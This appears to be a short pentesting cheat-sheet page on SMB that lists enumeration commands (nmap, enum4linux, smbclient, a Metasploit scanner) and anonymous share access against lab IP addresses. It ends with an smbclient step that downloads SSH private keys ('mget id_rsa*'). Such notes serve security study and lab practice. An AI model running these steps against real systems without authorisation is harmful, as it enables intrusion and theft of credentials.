SMB Pentesting

Find and exploit SMB vulnerabilities

Enumeration

Using nmap

sudo nmap -sC -sV 10.10.170.245

Using enum4linux

enum4linux -a 10.10.170.245

Using smbclient

List all available shares

smbclient -N -L \\\\10.129.95.187\\

Using metasploit

use auxiliary/scanner/smb/smb_version

Exploitation

The smbclient utility and impacket library are two good utilities to exploit SMB vulnerability.

Using smbclient

Let's say we want to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port

smbclient //10.10.10.2/secret -U "suit" -p 445

Anonymous login with empty passwords

In general shares

smbclient //10.10.96.221/profiles -U ''
smbclient //10.10.96.221/profiles -U 'Anonymous'

Navigating through SMB

List all available files

smb: \> ls
smb: \> dir

Get multiple or single files (mget command)

smb: \.ssh\> mget id_rsa*
PreviousBasics of SMBNextLDAP (Lightweight Directory Access Protocol)

Last updated